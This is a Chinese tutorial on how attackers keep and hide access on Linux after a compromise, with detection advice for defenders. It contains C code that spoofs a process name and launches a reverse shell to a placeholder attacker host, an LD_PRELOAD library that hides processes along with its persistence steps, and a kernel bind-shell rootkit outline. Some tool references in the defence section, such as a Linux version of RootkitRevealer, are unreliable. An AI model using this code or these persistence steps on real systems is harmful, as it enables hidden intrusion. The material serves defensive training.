Linux 权限维持与隐藏技术详解<\/h2>

文档说明<\/h3>

本文档旨在深入解析在 Linux 环境中，攻击者在获得初始权限后，如何通过各种技术手段维持权限并隐藏自身踪迹。内容涵盖从用户空间到内核空间的多项技术，并同时提供相应的检测与防御方案，以帮助蓝队成员更好地进行安全防护。<\/p>

目标读者：<\/strong> 具备一定 Linux 基础的安全研究人员、渗透测试人员及系统安全运维人员。
警告：<\/strong> 本文所述技术仅用于安全研究、学习与授权测试，严禁用于非法用途。<\/p>

第一章：进程隐藏 - 修改 argv[0]<\/h3>
1.1 技术原理<\/h4>
在 C 语言程序中，main<\/code> 函数的标准形式为 int main(int argc, char *argv[])<\/code>。其中：<\/p>
argc<\/code>：命令行参数的数量。<\/li> argv<\/code>：一个指向字符串数组的指针，argv[0]<\/code> 通常指向程序自身的名称。<\/li> <\/ul> 关键点在于，argv[0]<\/code> 所指向的内存区域是可写的<\/strong>。这意味着程序在运行时可以动态修改 ps<\/code>、top<\/code> 等命令显示出来的进程名称。<\/p> 1.2 实现方法<\/h4> 攻击者可以编写一个特殊的“加载器”程序。该程序的主要逻辑如下：<\/p> 使用 fork()<\/code> 系统调用创建一个子进程。<\/li> 在子进程中，修改 argv[0]<\/code> 的内容，例如将其伪装成 [kworker\/0:0]<\/code>、[ksoftirqd\/0]<\/code> 等合法的内核线程名称。<\/li> 在子进程中执行真正的恶意负载（如反向 Shell）。<\/li> <\/ol> 示例代码片段：<\/strong><\/p> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <string.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) { <\/span><\/span> pid_t pid =<\/span> fork(); <\/span><\/span> if<\/span> (pid ==<\/span> 0<\/span>) { <\/span><\/span> \/\/ 在子进程中 <\/span><\/span><\/span><\/span> strncpy(argv[0<\/span>], "[kworker\/0:0]"<\/span>, strlen(argv[0<\/span>])); <\/span><\/span> \/\/ 执行恶意程序，例如 reverse shell <\/span><\/span><\/span><\/span> system("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/attacker_ip\/port 0>&1'"<\/span>); <\/span><\/span> exit(0<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>1.3 技术破绽与检测<\/h4> 这种隐藏手段较为初级，存在多个明显破绽，容易被发现：<\/p> \/proc\/[pid]\/exe<\/code> 链接<\/strong>：<\/p> 即使进程名被修改，\/proc\/[pid]\/exe<\/code> 符号链接仍然指向真实的、在磁盘上的可执行文件。<\/li> 检测命令<\/strong>：ls -la \/proc\/[可疑pid]\/exe<\/code><\/li> <\/ul> <\/li> 启动用户<\/strong>：<\/p> 真正的内核线程（名称通常以 [<\/code> 括号括起）的启动用户永远是 root<\/code>。<\/li> 如果一个名为 [kworker\/0:0]<\/code> 的进程是由普通用户（如 www-data<\/code>、neko<\/code>）启动的，则极有可能是伪装的。<\/li> 检测命令<\/strong>：ps -eo pid,user,comm | grep "\["<\/code><\/li> <\/ul> <\/li> 关联的 TTY<\/strong>：<\/p> 真正的内核线程没有关联的终端（TTY 字段显示为 ?<\/code>）。<\/li> 伪造的进程通常由 Shell 启动，会关联一个伪终端（如 pts\/0<\/code> 或 pts\/1<\/code>）。<\/li> 检测命令<\/strong>：ps -ef | grep "\["<\/code> 查看 TTY 列。<\/li> <\/ul> <\/li> <\/ol> 第二章：用户空间劫持 - LD_PRELOAD<\/h3> 2.1 技术原理<\/h4> LD_PRELOAD<\/code> 是 Linux 系统的一个环境变量。它允许用户指定在程序运行前优先加载的共享库（.so<\/code> 文件）。动态链接器在加载程序时，会先加载 LD_PRELOAD<\/code> 指定的库，然后再加载程序依赖的其他库。这导致了“符号竞争”（Symbol Hijacking）的可能性。<\/p> 原理<\/strong>：当一个可执行程序调用某个函数（如 readdir<\/code>）时，动态链接器的查找顺序是：<\/p> 程序本身（如果静态链接了该函数）。<\/li> LD_PRELOAD<\/code> 环境变量中指定的库。<\/li> \/etc\/ld.so.preload<\/code> 文件中指定的库（全局生效，需要 root 权限）。<\/li> 默认的系统共享库（如 \/lib\/x86_64-linux-gnu\/libc.so.6<\/code>）。<\/li> <\/ol> 因此，如果 LD_PRELOAD<\/code> 指定的库中包含了与系统库同名的函数（例如 readdir<\/code>），程序就会优先执行 LD_PRELOAD<\/code> 库中的版本，从而实现劫持。<\/p> 2.2 实现方法：隐藏特定进程<\/h4> 劫持 readdir<\/code> 函数可以用于隐藏 ps<\/code>、top<\/code>、ls<\/code> 等命令输出中的特定进程或文件。<\/p> 示例劫持库代码 (hider.c<\/code>):<\/strong><\/p> #define _GNU_SOURCE <\/span><\/span><\/span>#include<\/span> <dirent.h><\/span> <\/span><\/span><\/span>#include<\/span> <string.h><\/span> <\/span><\/span><\/span>#include<\/span> <dlfcn.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 定义原版readdir的函数指针 <\/span><\/span><\/span><\/span>struct<\/span> dirent *<\/span>(*<\/span>original_readdir)(DIR *<\/span>dirp); <\/span><\/span> <\/span><\/span>struct<\/span> dirent *<\/span>readdir<\/span>(DIR *<\/span>dirp) { <\/span><\/span> \/\/ 获取原版readdir函数地址 <\/span><\/span><\/span><\/span> original_readdir =<\/span> dlsym(RTLD_NEXT, "readdir"<\/span>); <\/span><\/span> struct<\/span> dirent *<\/span>dir; <\/span><\/span> <\/span><\/span> while<\/span> ((dir =<\/span> original_readdir(dirp)) !=<\/span> NULL) { <\/span><\/span> \/\/ 如果目录项名称不是我们要隐藏的进程名，则返回 <\/span><\/span><\/span><\/span> if<\/span> (strstr(dir-><\/span>d_name, "my_malicious_process"<\/span>) ==<\/span> 0<\/span>) { <\/span><\/span> break<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> return<\/span> dir; <\/span><\/span>} <\/span><\/span><\/code><\/pre>编译劫持库：<\/strong><\/p> gcc -shared -fPIC -o hider.so hider.c -ldl <\/span><\/span><\/code><\/pre>使用方法：<\/strong><\/p> 临时生效（当前会话）<\/strong>：export LD_PRELOAD=\/path\/to\/hider.so<\/code><\/li> 永久生效（对当前用户）<\/strong>：将 export LD_PRELOAD=\/path\/to\/hider.so<\/code> 写入用户家目录的 ~\/.bashrc<\/code> 或 ~\/.profile<\/code> 文件中。<\/li> 全局生效（需要 root）<\/strong>：将库的完整路径写入 \/etc\/ld.so.preload<\/code> 文件。<\/li> <\/ul> 2.3 检测与对抗<\/h4> 使用 strace<\/code> 追踪<\/strong>：<\/p> strace<\/code> 可以跟踪程序执行时的系统调用。由于 LD_PRELOAD<\/code> 劫持发生在用户空间，而 strace<\/code> 在更底层监控系统调用，因此可以绕过这种劫持，看到真实的 getdents<\/code> 系统调用（readdir<\/code> 会调用它）结果。<\/li> 检测命令<\/strong>：strace -e trace=getdents ps aux 2>&1 | grep malicious_process<\/code><\/li> <\/ul> <\/li> 使用静态编译的工具<\/strong>：<\/p> 静态编译的程序在编译时已将所需的库函数打包进二进制文件内部，运行时不再依赖外部的动态链接库，因此完全不受 LD_PRELOAD<\/code> 影响。<\/li> 推荐工具<\/strong>：静态编译的 busybox<\/code>。下载静态编译的 busybox<\/code> 二进制文件。<\/li> 使用它提供的 ps<\/code>、ls<\/code> 等命令进行检查：.\/busybox ps aux<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 第三章：内核模块 Rootkit<\/h3> 3.1 技术原理与权限要求<\/h4> 当攻击者获得 root 权限<\/strong> 后，便可以进行更深层次的权限维持，即直接修改内核。通过编写和加载内核模块（LKM, Loadable Kernel Module），攻击者可以hook系统调用、隐藏文件、进程、网络连接等，其隐蔽性远高于用户空间技术。<\/p> 3.2 案例一：文件释放与守护<\/h4> 此类 Rootkit 模块在加载时，会释放一个嵌入在模块中的 ELF 二进制文件（后门）到磁盘上，并确保其持续运行。<\/p> 扩展功能<\/strong>：<\/p> 可以定期检查后门进程是否存活，若进程被杀掉，则自动重新启动它，实现“打不死”的守护功能。<\/li> 可以将后门代码直接以内核模块中的 Shellcode 形式存在，定期检查并执行，避免在磁盘上留下文件。<\/li> <\/ul> 3.3 案例二：内核级 Bind Shell<\/h4> 此类 Rootkit 模块直接在内核层面开启一个网络端口，并绑定一个 Shell。<\/p> 典型实现流程<\/strong>：<\/p> 攻击者编写内核模块，在其中创建一个内核线程。<\/li> 该线程监听一个特定的 TCP 端口（例如文档中的 65522）。<\/li> 当有连接到来时，直接在内核空间处理连接请求，并 execve<\/code> 一个 \/bin\/sh<\/code> 进程，将其输入\/输出重定向到网络套接字。<\/li> 攻击者使用 nc target_ip 65522<\/code> 即可获得一个 root Shell。<\/li> <\/ol> 安装与持久化<\/strong>：<\/p> 编译内核模块（.ko<\/code> 文件）。<\/li> 使用 insmod<\/code> 命令加载模块。<\/li> 保证重启有效<\/strong>：将模块加载命令（如 insmod \/path\/to\/rootkit.ko<\/code>）添加到 \/etc\/rc.local<\/code> 或创建一个 systemd service 等开机自启动脚本中。<\/li> <\/ol> 3.4 检测与防御<\/h4> 内核级 Rootkit 的检测非常困难，通常需要借助外部工具或硬件。<\/p> 内核模块完整性检查<\/strong>：<\/p> 使用 lsmod<\/code> 查看已加载模块列表，与已知合法模块列表对比。<\/li> 使用 modinfo [module_name]<\/code> 查看模块信息，可疑模块往往信息不全或异常。<\/li> <\/ul> <\/li> 使用基于内核的完整性监控<\/strong>：<\/p> Linux Kernel Guard (LKG)<\/strong>：可以检测系统调用的钩子（Hook）。<\/li> Sysinternals RootkitRevealer (for Linux 版本)<\/strong>：比较原始数据和 API 返回数据的差异。<\/li> <\/ul> <\/li> 使用硬件辅助的安全技术<\/strong>：<\/p> UEFI Secure Boot<\/strong>：可以阻止加载未经验证签名的内核模块。<\/li> <\/ul> <\/li> 最有效但最极端的方法<\/strong>：<\/p> 从受信任的源重新安装系统，并恢复干净的数据备份。<\/li> <\/ul> <\/li> <\/ol> 总结与思维导图<\/h3> 技术层次<\/th> 技术名称<\/th> 权限要求<\/th> 隐蔽性<\/th> 关键检测方法<\/th> <\/tr> <\/thead> 用户空间<\/strong><\/td> 修改 argv[0]<\/strong><\/td> 无需 root<\/td> 低<\/td> 检查 \/proc\/[pid]\/exe<\/code>, 进程用户, TTY<\/td> <\/tr> 用户空间<\/strong><\/td> LD_PRELOAD 劫持<\/strong><\/td> 无需 root (全局需 root)<\/td> 中<\/td> 使用 strace<\/code>, 静态编译工具 (如 busybox)<\/td> <\/tr> 内核空间<\/strong><\/td> 内核模块 Rootkit<\/strong><\/td> 必须 root<\/strong><\/td> 高<\/td> 内核完整性检查工具, 硬件安全启动<\/td> <\/tr> <\/tbody> <\/table> 防御原则：<\/strong><\/p> 最小权限原则<\/strong>：严格限制用户和进程的权限，避免攻击者轻易获取 root。<\/li> 监控与审计<\/strong>：部署 HIDS（主机入侵检测系统），对进程、文件、网络连接进行持续监控和日志审计。<\/li> 保持系统更新<\/strong>：及时修补漏洞，减少攻击面。<\/li> 使用可信软件源<\/strong>：避免安装来路不明的软件和模块。<\/li> <\/ul> 文档结束<\/strong><\/p> 希望这份详尽的教学文档能够帮助你全面理解 Linux 权限维持与隐藏的技术脉络。请务必在合法合规的环境下使用这些知识。<\/p>